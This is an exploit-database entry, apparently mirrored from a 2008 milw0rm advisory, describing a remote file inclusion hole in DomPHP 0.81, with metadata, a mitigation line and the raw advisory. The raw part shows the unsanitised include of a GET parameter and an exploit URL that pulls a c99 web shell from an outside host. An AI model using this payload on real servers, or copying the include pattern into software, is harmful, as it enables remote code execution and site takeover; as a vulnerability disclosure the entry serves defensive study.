DomPHP v0.81 Remote File Inclusion Vulnerability

vendor:

DomPHP

by:

H-T Team (HouSSamix _ ToXiC350)

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: DomPHP

Affected Version From: 0.81

Affected Version To: 0.81

Patch Exists: YES

Related CWE: N/A

CPE: a:domphp:domphp:0.81

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

DomPHP v0.81 Remote File Inclusion Vulnerability

DomPHP v0.81 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a maliciously crafted URL with a malicious file as a parameter. The malicious file is then included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file inclusion operations.

Source

Exploit-DB raw data:

#########################################################################
         DomPHP v0.81   Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.net

## Script         : DomPHP
## Version    : 0.81 
## Site         : http://www.domphp.com
## Download    : http://www.domphp.com/download/cat.php?idcat=1

## Vulnerable CODE :
~~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
	include($_GET['page'].".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## EXPLOIT :
http://[HOST]/[Path]/aides/index.php?page=http://casavie.net/hack/c99.txt?



## GREETZ  :  CoNaN , RachiDox , DDOS , AND ALL MUSLIMS HACKERS 

Visit : http://no-hack.net && http://tryag.cc/cc

#########################################################################
         DomPHP v0.81   Remote File Inclusion Vulnerability
#########################################################################

# milw0rm.com [2008-01-10]